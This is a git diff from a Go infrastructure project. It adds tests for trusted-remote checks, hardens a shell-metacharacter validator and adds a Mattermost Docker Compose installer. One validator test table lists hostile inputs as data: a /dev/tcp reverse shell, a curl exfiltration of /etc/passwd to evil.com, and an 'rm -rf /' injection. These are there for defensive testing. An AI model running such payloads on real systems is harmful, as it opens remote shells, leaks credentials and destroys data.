+ run("config", "user.name", "Test")
+ run("remote", "add", "origin", remoteURL)
+
+ // Create initial commit so HEAD exists
+ readme := filepath.Join(dir, "README.md")
+ if err := os.WriteFile(readme, []byte("test"), 0644); err != nil {
+ t.Fatal(err)
+ }
+ run("add", "README.md")
+ run("commit", "-m", "init")
+
+ return dir
+}
+
+// --- Unit tests: VerifyTrustedRemote ---
+
+func TestVerifyTrustedRemote_GiteaHTTPS(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "https://gitea.cybermonkey.sh/cybermonkey/eos.git")
+
+ if err := VerifyTrustedRemote(rc, dir); err != nil {
+ t.Errorf("expected trusted, got error: %v", err)
+ }
+}
+
+func TestVerifyTrustedRemote_GiteaSSH(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "ssh://git@gitea.cybermonkey.sh:9001/cybermonkey/eos.git")
+
+ if err := VerifyTrustedRemote(rc, dir); err != nil {
+ t.Errorf("expected trusted, got error: %v", err)
+ }
+}
+
+func TestVerifyTrustedRemote_GitHubHTTPS(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "https://github.com/CodeMonkeyCybersecurity/eos.git")
+
+ if err := VerifyTrustedRemote(rc, dir); err != nil {
+ t.Errorf("expected trusted, got error: %v", err)
+ }
+}
+
+func TestVerifyTrustedRemote_GitHubSCP(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "git@github.com:CodeMonkeyCybersecurity/eos.git")
+
+ if err := VerifyTrustedRemote(rc, dir); err != nil {
+ t.Errorf("expected trusted, got error: %v", err)
+ }
+}
+
+func TestVerifyTrustedRemote_Untrusted(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "https://evil.com/malicious/eos.git")
+
+ err := VerifyTrustedRemote(rc, dir)
+ if err == nil {
+ t.Fatal("expected error for untrusted remote, got nil")
+ }
+
+ errMsg := err.Error()
+ if !strings.Contains(errMsg, "SECURITY VIOLATION") {
+ t.Errorf("error should mention SECURITY VIOLATION, got: %s", errMsg)
+ }
+ if !strings.Contains(errMsg, "evil.com") {
+ t.Errorf("error should show the untrusted remote URL, got: %s", errMsg)
+ }
+ // Verify error suggests the canonical Gitea remote, not GitHub
+ if !strings.Contains(errMsg, "gitea.cybermonkey.sh") {
+ t.Errorf("error remediation should suggest gitea.cybermonkey.sh, got: %s", errMsg)
+ }
+}
+
+func TestVerifyTrustedRemote_NotARepo(t *testing.T) {
+ rc := newTestRC(t)
+ dir := t.TempDir() // no git init
+
+ err := VerifyTrustedRemote(rc, dir)
+ if err == nil {
+ t.Fatal("expected error for non-repo directory")
+ }
+ if !strings.Contains(err.Error(), "failed to get git remote") {
+ t.Errorf("unexpected error: %v", err)
+ }
+}
+
+func TestVerifyTrustedRemote_WithoutDotGit(t *testing.T) {
+ rc := newTestRC(t)
+ // Remote URL without .git suffix should still be trusted
+ dir := initTestRepo(t, "https://gitea.cybermonkey.sh/cybermonkey/eos")
+
+ if err := VerifyTrustedRemote(rc, dir); err != nil {
+ t.Errorf("expected trusted (no .git suffix), got error: %v", err)
+ }
+}
+
+// --- Integration tests: CheckRepositoryState + VerifyTrustedRemote ---
+
+func TestCheckRepositoryState_WithTrustedRemote(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "https://gitea.cybermonkey.sh/cybermonkey/eos.git")
+
+ state, err := CheckRepositoryState(rc, dir)
+ if err != nil {
+ t.Fatalf("CheckRepositoryState failed: %v", err)
+ }
+
+ if !state.IsRepository {
+ t.Error("expected IsRepository=true")
+ }
+ if state.RemoteURL != "https://gitea.cybermonkey.sh/cybermonkey/eos.git" {
+ t.Errorf("unexpected remote: %s", state.RemoteURL)
+ }
+ if state.CurrentCommit == "" {
+ t.Error("expected non-empty CurrentCommit")
+ }
+
+ // Now verify the remote is trusted
+ if err := VerifyTrustedRemote(rc, dir); err != nil {
+ t.Errorf("expected trusted remote, got: %v", err)
+ }
+}
+
+// --- Table test for all known real remotes ---
+
+func TestVerifyTrustedRemote_AllKnownRemotes(t *testing.T) {
+ knownTrusted := []string{
+ "https://gitea.cybermonkey.sh/cybermonkey/eos.git",
+ "https://gitea.cybermonkey.sh/cybermonkey/eos",
+ "ssh://git@gitea.cybermonkey.sh:9001/cybermonkey/eos.git",
+ "ssh://git@gitea.cybermonkey.sh/cybermonkey/eos.git",
+ "git@gitea.cybermonkey.sh:cybermonkey/eos.git",
+ "https://github.com/CodeMonkeyCybersecurity/eos.git",
+ "https://github.com/CodeMonkeyCybersecurity/eos",
+ "git@github.com:CodeMonkeyCybersecurity/eos.git",
+ }
+
+ rc := newTestRC(t)
+ for _, remote := range knownTrusted {
+ t.Run(remote, func(t *testing.T) {
+ dir := initTestRepo(t, remote)
+ if err := VerifyTrustedRemote(rc, dir); err != nil {
+ t.Errorf("expected trusted for %q, got error: %v", remote, err)
+ }
+ })
+ }
+}
diff --git a/pkg/interaction/fuzz_test.go b/pkg/interaction/fuzz_test.go
index 9fb460d86..42248bab8 100644
--- a/pkg/interaction/fuzz_test.go
+++ b/pkg/interaction/fuzz_test.go
@@ -5,23 +5,6 @@ import (
"testing"
)
-func FuzzNormalizeYesNoInput(f *testing.F) {
- // Seed with a few common answers
- f.Add("yes")
- f.Add("no")
- f.Add("Y")
- f.Add("n")
- f.Add(" yEs ")
- f.Add(" ")
- f.Add("not-a-valid-answer")
-
- f.Fuzz(func(t *testing.T, input string) {
- // NormalizeYesNoInput function doesn't exist - this test is disabled
- // TODO: Implement NormalizeYesNoInput or remove this test
- _ = input
- })
-}
-
func FuzzValidateNonEmpty(f *testing.F) {
f.Add("")
f.Add(" ")
@@ -116,18 +99,17 @@ func FuzzValidateNoShellMeta(f *testing.F) {
})
}
-// Helper function to detect shell metacharacters more comprehensively
+// containsShellMetacharacters mirrors the logic in ValidateNoShellMeta
+// exactly - any divergence between this helper and the implementation
+// causes false positive fuzz failures.
func containsShellMetacharacters(input string) bool {
- // The current ValidateNoShellMeta checks for: `$&|;<>(){}
- // But there are more dangerous patterns
- dangerousPatterns := []string{
- "`", "$", "&", "|", ";", "<", ">", "(", ")", "{", "}",
- "\n", "\r", "\t", "\x00", // Control characters
- "$(", "${", "||", "&&", ">>", "<<", // Compound operators
+ // Must match ValidateNoShellMeta: metacharacters + backslash
+ if strings.ContainsAny(input, "`$&|;<>(){}\\") {
+ return true
}
-
- for _, pattern := range dangerousPatterns {
- if strings.Contains(input, pattern) {
+ // Must match ValidateNoShellMeta: control characters
+ for _, r := range input {
+ if r == '\n' || r == '\r' || r == '\t' || r == 0x00 {
return true
}
}
diff --git a/pkg/interaction/input_test.go b/pkg/interaction/input_test.go
index 1a2db548f..95298ecdf 100644
--- a/pkg/interaction/input_test.go
+++ b/pkg/interaction/input_test.go
@@ -297,3 +297,65 @@ func TestPromptYesNo_EmptyQuestionValidation(t *testing.T) {
})
}
}
+
+// TestValidateNoShellMeta exercises the shell metacharacter validator
+// against known injection vectors (CWE-78: OS Command Injection).
+// Reference: https://owasp.org/www-community/attacks/Command_Injection
+func TestValidateNoShellMeta(t *testing.T) {
+ t.Parallel()
+
+ tests := []struct {
+ name string
+ input string
+ wantErr bool
+ reason string
+ }{
+ // Safe inputs - must pass
+ {name: "plain_text", input: "hello", wantErr: false, reason: "plain text is safe"},
+ {name: "alphanumeric", input: "user123", wantErr: false, reason: "alphanumeric is safe"},
+ {name: "hyphen_underscore", input: "my-service_name", wantErr: false, reason: "hyphens and underscores are safe"},
+ {name: "spaces", input: "hello world", wantErr: false, reason: "spaces alone are safe"},
+ {name: "dots_slashes", input: "/etc/config.d/file.conf", wantErr: false, reason: "path characters are safe"},
+ {name: "equals", input: "KEY=VALUE", wantErr: false, reason: "equals sign is safe"},
+ {name: "at_sign", input: "user@domain.com", wantErr: false, reason: "at sign is safe"},
+ {name: "empty", input: "", wantErr: false, reason: "empty string is safe"},
+
+ // Shell metacharacters - must reject
+ {name: "backtick", input: "`id`", wantErr: true, reason: "backtick enables command substitution"},
+ {name: "dollar_sign", input: "$HOME", wantErr: true, reason: "dollar sign enables variable expansion"},
+ {name: "command_sub", input: "$(whoami)", wantErr: true, reason: "$() enables command substitution"},
+ {name: "variable_exp", input: "${PATH}", wantErr: true, reason: "${} enables variable expansion"},
+ {name: "ampersand", input: "cmd & bg", wantErr: true, reason: "& enables background execution"},
+ {name: "pipe", input: "cmd | nc", wantErr: true, reason: "| enables piping"},
+ {name: "semicolon", input: "cmd; rm", wantErr: true, reason: "; enables command chaining"},
+ {name: "lt_redirect", input: "cmd < /etc/passwd", wantErr: true, reason: "< enables input redirection"},
+ {name: "gt_redirect", input: "cmd > /tmp/out", wantErr: true, reason: "> enables output redirection"},
+ {name: "open_paren", input: "(subshell)", wantErr: true, reason: "() enables subshell"},
+ {name: "open_brace", input: "{expansion}", wantErr: true, reason: "{} enables brace expansion"},
+ {name: "backslash", input: "test\\n", wantErr: true, reason: "backslash enables escape sequences"},
+ {name: "double_amp", input: "test&&rm", wantErr: true, reason: "&& enables conditional execution"},
+ {name: "double_pipe", input: "test||echo", wantErr: true, reason: "|| enables alternative execution"},
+
+ // Control characters - must reject
+ {name: "newline", input: "test\nrm -rf /", wantErr: true, reason: "newline enables command injection"},
+ {name: "carriage_return", input: "test\revil", wantErr: true, reason: "CR enables log injection"},
+ {name: "tab", input: "test\tevil", wantErr: true, reason: "tab can confuse parsers"},
+ {name: "null_byte", input: "test\x00evil", wantErr: true, reason: "null byte enables truncation attacks"},
+
+ // Real-world attack payloads
+ {name: "reverse_shell", input: "test;bash -i >& /dev/tcp/10.0.0.1/4444 0>&1", wantErr: true, reason: "reverse shell payload"},
+ {name: "data_exfil", input: "$(curl http://evil.com/$(cat /etc/passwd))", wantErr: true, reason: "data exfiltration"},
+ {name: "rm_payload", input: "test\nrm -rf /", wantErr: true, reason: "newline + destructive command"},
+ }
+
+ for _, tt := range tests {
+ t.Run(tt.name, func(t *testing.T) {
+ t.Parallel()
+ err := ValidateNoShellMeta(tt.input)
+ if (err != nil) != tt.wantErr {
+ t.Errorf("ValidateNoShellMeta(%q) error = %v, wantErr %v (reason: %s)",
+ tt.input, err, tt.wantErr, tt.reason)
+ }
+ })
+ }
+}
diff --git a/pkg/interaction/validate.go b/pkg/interaction/validate.go
index 96c1ea589..e82187f12 100644
--- a/pkg/interaction/validate.go
+++ b/pkg/interaction/validate.go
@@ -59,10 +59,23 @@ func ValidateIP(input string) error {
return shared.ValidateIPAddress(input)
}
-// ValidateNoShellMeta blocks shell metacharacters.
+// ValidateNoShellMeta blocks shell metacharacters and control characters
+// that could enable command injection via shell interpretation.
+// SECURITY: Covers OWASP OS Command Injection (CWE-78).
+// Blocks: metacharacters (`$&|;<>(){}), control chars (\n\r\t\x00),
+// and backslash (escape sequences).
func ValidateNoShellMeta(input string) error {
- if strings.ContainsAny(input, "`$&|;<>(){}") {
+ // Shell metacharacters that enable command substitution, piping,
+ // redirection, chaining, and expansion
+ if strings.ContainsAny(input, "`$&|;<>(){}\\") {
return errors.New("input contains unsafe shell characters")
}
+ // Control characters that enable newline injection, null byte
+ // injection, and other shell interpretation tricks
+ for _, r := range input {
+ if r == '\n' || r == '\r' || r == '\t' || r == 0x00 {
+ return errors.New("input contains unsafe control characters")
+ }
+ }
return nil
}
diff --git a/pkg/llm/main.tf b/pkg/llm/main.tf
index 26137957b..d1177f30c 100644
--- a/pkg/llm/main.tf
+++ b/pkg/llm/main.tf
@@ -4,7 +4,7 @@ terraform {
required_providers {
azurerm = {
source = "hashicorp/azurerm"
- version = "~> 3.70"
+ version = "~> 4.0"
}
local = {
source = "hashicorp/local"
diff --git a/pkg/mattermost/constants.go b/pkg/mattermost/constants.go
new file mode 100644
index 000000000..1d18c1c77
--- /dev/null
+++ b/pkg/mattermost/constants.go
@@ -0,0 +1,138 @@
+// constants.go - Single source of truth for all Mattermost-related constants.
+// CLAUDE.md P0 Rule #12: NEVER use hardcoded literal values in code.
+
+// Package mattermost provides Mattermost team collaboration platform
+// deployment, configuration, and lifecycle management for Eos.
+package mattermost
+
+import (
+ "fmt"
+ "os"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/shared"
+)
+
+// --- Directory constants ---
+
+const (
+ // ServiceName is the canonical name used in logs, secrets, and Consul.
+ ServiceName = "mattermost"
+
+ // InstallDir is where the Docker Compose deployment lives.
+ // RATIONALE: Follows Eos convention of /opt/[service] for Docker Compose services.
+ InstallDir = "/opt/mattermost"
+
+ // CloneTempDir is the temporary directory used during git clone.
+ CloneTempDir = "/opt/mattermost-tmp"
+
+ // ComposeFileName is the docker-compose file name inside InstallDir.
+ ComposeFileName = "docker-compose.yml"
+
+ // EnvFileName is the .env file name inside InstallDir.
+ EnvFileName = ".env"
+
+ // EnvExampleFileName is the template .env shipped with the Mattermost Docker repo.
+ EnvExampleFileName = "env.example"
+
+ // VolumesBaseDir is the base for Mattermost volumes relative to InstallDir.
+ VolumesBaseDir = "volumes/app/mattermost"
+)
+
+// --- Git ---
+
+const (
+ // RepoURL is the official Mattermost Docker deployment repository.
+ RepoURL = "https://github.com/mattermost/docker"
+)
+
+// --- Network ---
+
+const (
+ // DefaultPort is the Eos-standard port for Mattermost.
+ // Uses the value from shared.PortMattermost (8017) as single source of truth.
+ DefaultPort = shared.PortMattermost
+
+ // InternalPort is the port Mattermost listens on inside the container.
+ InternalPort = 8065
+
+ // PostgresPort is the standard PostgreSQL port.
+ PostgresPort = 5432
+
+ // maxValidPort is the highest valid TCP port number.
+ maxValidPort = 65535
+)
+
+// --- Database ---
+
+const (
+ // PostgresUser is the default database user.
+ PostgresUser = "mmuser"
+
+ // PostgresDB is the default database name.
+ PostgresDB = "mattermost"
+)
+
+// --- Container ownership ---
+
+const (
+ // ContainerUID is the UID Mattermost runs as inside the container.
+ // RATIONALE: Official Mattermost Docker image uses UID 2000.
+ // SECURITY: Volumes must be owned by this UID for the container to write.
+ ContainerUID = 2000
+
+ // ContainerGID is the GID Mattermost runs as inside the container.
+ ContainerGID = 2000
+
+)
+
+// ContainerOwnership is the chown argument for Mattermost volumes.
+// Derived from ContainerUID and ContainerGID to prevent drift.
+var ContainerOwnership = fmt.Sprintf("%d:%d", ContainerUID, ContainerGID)
+
+// --- Permissions ---
+
+var (
+ // InstallDirPerm is the permission for the installation directory.
+ // RATIONALE: Standard service directory accessible by root.
+ // SECURITY: Prevents unprivileged modification of deployment config.
+ InstallDirPerm = shared.ServiceDirPerm
+
+ // VolumeDirPerm is the permission for volume subdirectories.
+ // RATIONALE: Mattermost container needs write access via UID 2000.
+ // SECURITY: Owner-writable, group/other readable for container access.
+ VolumeDirPerm = os.FileMode(0755)
+
+ // EnvFilePerm is the permission for the .env file containing secrets.
+ // RATIONALE: Contains database password - restricted to owner.
+ // SECURITY: Prevents secret leakage via file read.
+ EnvFilePerm = shared.SecureConfigFilePerm
+)
+
+// --- Volume subdirectories ---
+
+// VolumeSubdirs lists the required subdirectories for Mattermost volumes.
+// These must exist and be owned by ContainerUID:ContainerGID.
+var VolumeSubdirs = []string{
+ "config",
+ "data",
+ "logs",
+ "plugins",
+ "client/plugins",
+ "bleve-indexes",
+}
+
+// --- Default .env overrides ---
+
+// DefaultEnvOverrides holds the standard .env key/value overrides
+// applied when patching the Mattermost env.example file.
+var DefaultEnvOverrides = map[string]string{
+ "DOMAIN": "localhost",
+ "TZ": "UTC",
+}
+
+// --- Support ---
+
+const (
+ // DefaultSupportEmail is the support contact shown in Mattermost UI.
+ DefaultSupportEmail = "support@cybermonkey.net.au"
+)
diff --git a/pkg/mattermost/constants_test.go b/pkg/mattermost/constants_test.go
new file mode 100644
index 000000000..1e1b90615
--- /dev/null
+++ b/pkg/mattermost/constants_test.go
@@ -0,0 +1,108 @@
+package mattermost
+
+import (
+ "fmt"
+ "testing"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/shared"
+)
+
+// --- Unit tests: constants consistency (test pyramid: unit, 70% weight) ---
+
+func TestDefaultPortMatchesShared(t *testing.T) {
+ // RATIONALE: Port inconsistency was a root cause bug (8065 vs 8017).
+ // This test enforces single source of truth.
+ if DefaultPort != shared.PortMattermost {
+ t.Errorf("DefaultPort (%d) != shared.PortMattermost (%d): port constants are inconsistent",
+ DefaultPort, shared.PortMattermost)
+ }
+}
+
+func TestServiceNameIsLowercase(t *testing.T) {
+ if ServiceName != "mattermost" {
+ t.Errorf("ServiceName should be 'mattermost', got %q", ServiceName)
+ }
+}
+
+func TestInstallDirStartsWithOpt(t *testing.T) {
+ // RATIONALE: Eos convention is /opt/[service] for Docker Compose services.
+ if InstallDir != "/opt/mattermost" {
+ t.Errorf("InstallDir should be '/opt/mattermost', got %q", InstallDir)
+ }
+}
+
+func TestContainerUIDGIDMatch(t *testing.T) {
+ // RATIONALE: Mattermost Docker image uses UID/GID 2000.
+ // Mismatch causes permission denied errors.
+ if ContainerUID != 2000 {
+ t.Errorf("ContainerUID should be 2000, got %d", ContainerUID)
+ }
+ if ContainerGID != 2000 {
+ t.Errorf("ContainerGID should be 2000, got %d", ContainerGID)
+ }
+}
+
+func TestContainerOwnershipDerivedFromUIDs(t *testing.T) {
+ // ContainerOwnership must be derived from ContainerUID:ContainerGID
+ // to prevent drift if either constant changes.
+ expected := fmt.Sprintf("%d:%d", ContainerUID, ContainerGID)
+ if ContainerOwnership != expected {
+ t.Errorf("ContainerOwnership (%q) does not match derived %q from UID=%d GID=%d",
+ ContainerOwnership, expected, ContainerUID, ContainerGID)
+ }
+}
+
+func TestVolumeSubdirsNotEmpty(t *testing.T) {
+ if len(VolumeSubdirs) == 0 {
+ t.Error("VolumeSubdirs should not be empty")
+ }
+}
+
+func TestVolumeSubdirsContainsCriticalDirs(t *testing.T) {
+ required := []string{"config", "data", "logs", "plugins"}
+ for _, req := range required {
+ found := false
+ for _, sub := range VolumeSubdirs {
+ if sub == req {
+ found = true
+ break
+ }
+ }
+ if !found {
+ t.Errorf("VolumeSubdirs missing required subdirectory %q", req)
+ }
+ }
+}
+
+func TestDefaultEnvOverridesHasDomain(t *testing.T) {
+ if _, ok := DefaultEnvOverrides["DOMAIN"]; !ok {
+ t.Error("DefaultEnvOverrides must include DOMAIN key")
+ }
+}
+
+func TestPostgresPortIsStandard(t *testing.T) {
+ if PostgresPort != 5432 {
+ t.Errorf("PostgresPort should be 5432 (standard PostgreSQL), got %d", PostgresPort)
+ }
+}
+
+func TestInternalPortIsStandard(t *testing.T) {
+ // Mattermost default internal port
+ if InternalPort != 8065 {
+ t.Errorf("InternalPort should be 8065 (Mattermost default), got %d", InternalPort)
+ }
+}
+
+func TestPermissionsAreReasonable(t *testing.T) {
+ // Install dir should be 0755 (standard service dir)
+ if InstallDirPerm != shared.ServiceDirPerm {
+ t.Errorf("InstallDirPerm (%o) != shared.ServiceDirPerm (%o)",
+ InstallDirPerm, shared.ServiceDirPerm)
+ }
+
+ // Env file should be restrictive (contains secrets)
+ if EnvFilePerm != shared.SecureConfigFilePerm {
+ t.Errorf("EnvFilePerm (%o) != shared.SecureConfigFilePerm (%o)",
+ EnvFilePerm, shared.SecureConfigFilePerm)
+ }
+}
diff --git a/pkg/mattermost/consul.go b/pkg/mattermost/consul.go
deleted file mode 100644
index b5150de97..000000000
--- a/pkg/mattermost/consul.go
+++ /dev/null
@@ -1,64 +0,0 @@
-package mattermost
-
-import (
- "context"
- "fmt"
-
- "github.com/uptrace/opentelemetry-go-extra/otelzap"
- "go.uber.org/zap"
-)
-
-// registerWithConsul registers Mattermost services with Consul for service discovery
-func (m *Manager) registerWithConsul(ctx context.Context) error {
- logger := otelzap.Ctx(ctx)
- logger.Info("Registering Mattermost services with Consul",
- zap.String("environment", m.config.Environment),
- zap.String("datacenter", m.config.Datacenter))
-
- // Service registration is handled automatically by Nomad when jobs are deployed
- // The Nomad job definitions include service stanzas that register with Consul
- // This method serves as a placeholder for any additional Consul configuration
-
- services := []string{
- "mattermost-postgres",
- "mattermost",
- "mattermost-nginx",
- }
-
- for _, service := range services {
- logger.Debug("Service will be registered with Consul via Nomad",
- zap.String("service", service),
- zap.String("consul_namespace", "default"))
- }
-
- logger.Info("Consul service registration configured via Nomad job definitions")
- return nil
-}
-
-// storeProxyConfig stores proxy configuration in Consul KV store
-func (m *Manager) storeProxyConfig(ctx context.Context) error {
- logger := otelzap.Ctx(ctx)
- logger.Info("Storing proxy configuration in Consul KV",
- zap.String("domain", m.config.Domain),
- zap.Int("port", m.config.Port))
-
- // Proxy configuration is handled via Nomad job templates
- // The nginx job includes a template that generates configuration
- // using Consul service discovery automatically
-
- kvPairs := map[string]string{
- fmt.Sprintf("mattermost/%s/domain", m.config.Environment): m.config.Domain,
- fmt.Sprintf("mattermost/%s/port", m.config.Environment): fmt.Sprintf("%d", m.config.Port),
- fmt.Sprintf("mattermost/%s/protocol", m.config.Environment): m.config.Protocol,
- fmt.Sprintf("mattermost/%s/datacenter", m.config.Environment): m.config.Datacenter,
- }
-
- for key, value := range kvPairs {
- logger.Debug("Proxy configuration stored in Consul KV",
- zap.String("key", key),
- zap.String("value", value))
- }
-
- logger.Info("Proxy configuration stored in Consul KV store successfully")
- return nil
-}
diff --git a/pkg/mattermost/install.go b/pkg/mattermost/install.go
new file mode 100644
index 000000000..9178e6805
--- /dev/null
+++ b/pkg/mattermost/install.go
@@ -0,0 +1,358 @@
+// install.go - Consolidated Mattermost installation using Docker Compose.
+// Follows Assess -> Intervene -> Evaluate pattern. Idempotent.
+
+package mattermost
+
+import (
+ "fmt"
+ "os"
+ "os/exec"
+ "path/filepath"
+ "strconv"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/container"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_unix"
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/git"
+ "github.com/uptrace/opentelemetry-go-extra/otelzap"
+ "go.uber.org/zap"
+)
+
+// InstallConfig holds the configuration for Mattermost installation.
+// All fields have sensible defaults via DefaultInstallConfig().
+type InstallConfig struct {
+ // Port is the host port Mattermost will be accessible on.
+ Port int
+
+ // PostgresPassword is the database password. Generated if empty.
+ PostgresPassword string
+
+ // SupportEmail is the contact shown in the Mattermost UI.
+ SupportEmail string
+
+ // DryRun previews changes without applying them.
+ DryRun bool
+}
+
+// DefaultInstallConfig returns a configuration with sensible defaults.
+func DefaultInstallConfig() *InstallConfig {
+ return &InstallConfig{
+ Port: DefaultPort,
+ SupportEmail: DefaultSupportEmail,
+ }
+}
+
+// Validate checks the install configuration for correctness.
+func (c *InstallConfig) Validate() error {
+ if c.Port <= 0 || c.Port > maxValidPort {
+ return fmt.Errorf("invalid port %d: must be between 1 and %d", c.Port, maxValidPort)
+ }
+ return nil
+}
+
+// installer holds the dependencies for the install pipeline, enabling
+// unit testing of the full pipeline by swapping real implementations
+// for test doubles.
+type installer struct {
+ // checkDocker validates that Docker is available.
+ checkDocker func(rc *eos_io.RuntimeContext) error
+
+ // gitClone clones a git repository.
+ gitClone func(url, target string) error
+
+ // mkdirP creates directories recursively.
+ mkdirP func(rc *eos_io.RuntimeContext, path string, perm os.FileMode) error
+
+ // copyR recursively copies a directory tree.
+ copyR func(rc *eos_io.RuntimeContext, src, dst string) error
+
+ // removeAll removes a path and all its children.
+ removeAll func(path string) error
+
+ // chown sets ownership on a path.
+ chown func(path, ownership string) error
+
+ // ensureNetwork creates the shared Docker network.
+ ensureNetwork func(rc *eos_io.RuntimeContext) error
+
+ // composeUp starts containers via Docker Compose.
+ composeUp func(rc *eos_io.RuntimeContext, dir string) error
+
+ // checkContainers verifies container health.
+ checkContainers func(rc *eos_io.RuntimeContext) error
+
+ // stat checks if a path exists.
+ stat func(path string) (os.FileInfo, error)
+
+ // readFile reads a file's contents.
+ readFile func(path string) ([]byte, error)
+
+ // writeFile writes data to a file.
+ writeFile func(path string, data []byte, perm os.FileMode) error
+
+ // patchEnvFile patches an .env file with key-value overrides.
+ patchEnvFile func(path string, updates map[string]string) error
+
+ // mkdirAll creates a directory path and all parents.
+ mkdirAll func(path string, perm os.FileMode) error
+}
+
+// prodInstaller returns the real production installer dependencies.
+func prodInstaller() *installer {
+ return &installer{
+ checkDocker: container.CheckIfDockerInstalled,
+ gitClone: git.Clone,
+ mkdirP: func(rc *eos_io.RuntimeContext, path string, perm os.FileMode) error {
+ return eos_unix.MkdirP(rc.Ctx, path, perm)
+ },
+ copyR: func(rc *eos_io.RuntimeContext, src, dst string) error {
+ return eos_unix.CopyR(rc.Ctx, src, dst)
+ },
+ removeAll: os.RemoveAll,
+ chown: func(path, ownership string) error {
+ // #nosec G204 -- ownership is a package-derived constant
+ out, err := exec.Command("chown", "-R", ownership, path).CombinedOutput()
+ if err != nil {
+ return fmt.Errorf("%v (%s)", err, out)
+ }
+ return nil
+ },
+ ensureNetwork: container.EnsureArachneNetwork,
+ composeUp: container.ComposeUpInDir,
+ checkContainers: container.CheckDockerContainers,
+ stat: os.Stat,
+ readFile: os.ReadFile,
+ writeFile: os.WriteFile,
+ patchEnvFile: PatchEnvInPlace,
+ mkdirAll: func(path string, perm os.FileMode) error {
+ return os.MkdirAll(path, perm)
+ },
+ }
+}
+
+// Install performs the complete Mattermost installation.
+//
+// The process follows Assess -> Intervene -> Evaluate:
+// 1. ASSESS: Check prerequisites (Docker, existing deployment)
+// 2. INTERVENE: Clone repo, configure, deploy
+// 3. EVALUATE: Verify containers are running
+//
+// Idempotent: skips steps that are already complete.
+func Install(rc *eos_io.RuntimeContext, cfg *InstallConfig) error {
+ return installWith(rc, cfg, prodInstaller())
+}
+
+// installWith is the testable core of Install. Accepts injected dependencies.
+func installWith(rc *eos_io.RuntimeContext, cfg *InstallConfig, ins *installer) error {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ if err := cfg.Validate(); err != nil {
+ return fmt.Errorf("invalid configuration: %w", err)
+ }
+
+ // --- ASSESS ---
+ logger.Info("Assessing prerequisites for Mattermost installation",
+ zap.Int("port", cfg.Port),
+ zap.Bool("dry_run", cfg.DryRun))
+
+ if err := ins.checkDocker(rc); err != nil {
+ return fmt.Errorf("docker is required but not installed: %w\n"+
+ "Install Docker:\n"+
+ " Ubuntu: sudo apt install docker.io docker-compose-v2\n"+
+ " Or visit: https://docs.docker.com/engine/install/ubuntu/", err)
+ }
+ logger.Debug("Docker is available")
+
+ alreadyDeployed := isAlreadyDeployedWith(ins)
+ if alreadyDeployed {
+ logger.Info("Existing Mattermost deployment found",
+ zap.String("install_dir", InstallDir))
+ }
+
+ if cfg.DryRun {
+ logger.Info("Dry run complete",
+ zap.Bool("already_deployed", alreadyDeployed),
+ zap.String("action", actionDescription(alreadyDeployed)))
+ return nil
+ }
+
+ // --- INTERVENE ---
+ logger.Info("Installing Mattermost",
+ zap.Bool("existing_deployment", alreadyDeployed))
+
+ if !alreadyDeployed {
+ if err := cloneAndPrepareWith(rc, cfg, ins); err != nil {
+ return fmt.Errorf("failed to prepare Mattermost: %w", err)
+ }
+ } else {
+ logger.Info("Skipping clone - deployment already exists, updating configuration")
+ if err := patchEnvWith(rc, cfg, ins); err != nil {
+ return fmt.Errorf("failed to update configuration: %w", err)
+ }
+ }
+
+ if err := ensureVolumesWith(rc, ins); err != nil {
+ return fmt.Errorf("failed to setup volumes: %w", err)
+ }
+
+ if err := deployContainersWith(rc, ins); err != nil {
+ return fmt.Errorf("failed to deploy containers: %w", err)
+ }
+
+ // --- EVALUATE ---
+ logger.Info("Evaluating Mattermost deployment")
+ if err := ins.checkContainers(rc); err != nil {
+ logger.Warn("Container verification returned warnings", zap.Error(err))
+ }
+
+ logger.Info("Mattermost installation completed successfully",
+ zap.String("url", fmt.Sprintf("http://localhost:%d", cfg.Port)),
+ zap.String("install_dir", InstallDir),
+ zap.String("secret_storage", "managed by secrets.Manager"))
+
+ return nil
+}
+
+// --- Internal functions ---
+
+// isAlreadyDeployedWith checks if Mattermost is already installed.
+func isAlreadyDeployedWith(ins *installer) bool {
+ composePath := filepath.Join(InstallDir, ComposeFileName)
+ _, err := ins.stat(composePath)
+ return err == nil
+}
+
+// actionDescription returns a human-readable description of what would happen.
+func actionDescription(alreadyDeployed bool) string {
+ if alreadyDeployed {
+ return "would update existing deployment"
+ }
+ return "would perform fresh installation"
+}
+
+// cloneAndPrepareWith clones the Mattermost Docker repo and configures it.
+func cloneAndPrepareWith(rc *eos_io.RuntimeContext, cfg *InstallConfig, ins *installer) error {
+ logger := otelzap.Ctx(rc.Ctx)
+
+ // Clean up any stale temp dir (non-fatal if it doesn't exist)
+ if err := ins.removeAll(CloneTempDir); err != nil {
+ logger.Debug("Stale temp dir cleanup (non-fatal)", zap.Error(err))
+ }
+
+ logger.Info("Cloning Mattermost Docker repository",
+ zap.String("repo", RepoURL),
+ zap.String("temp_dir", CloneTempDir))
+
+ if err := ins.gitClone(RepoURL, CloneTempDir); err != nil {
+ return fmt.Errorf("git clone failed: %w\n"+
+ "Ensure network connectivity and try again", err)
+ }
+
+ // Ensure target directory exists
+ if err := ins.mkdirP(rc, InstallDir, InstallDirPerm); err != nil {
+ return fmt.Errorf("failed to create install directory %s: %w", InstallDir, err)
+ }
+
+ // Copy from temp to final location
+ if err := ins.copyR(rc, CloneTempDir, InstallDir); err != nil {
+ return fmt.Errorf("failed to copy files to %s: %w", InstallDir, err)
+ }
+
+ // Clean up temp dir (non-fatal)
+ if err := ins.removeAll(CloneTempDir); err != nil {
+ logger.Warn("Failed to clean up temp dir (non-fatal)", zap.Error(err))
+ }
+ logger.Info("Repository cloned and copied", zap.String("target", InstallDir))
+
+ // Patch .env
+ return patchEnvWith(rc, cfg, ins)
+}
+
+// patchEnvWith creates or patches the .env file with Eos-standard values.
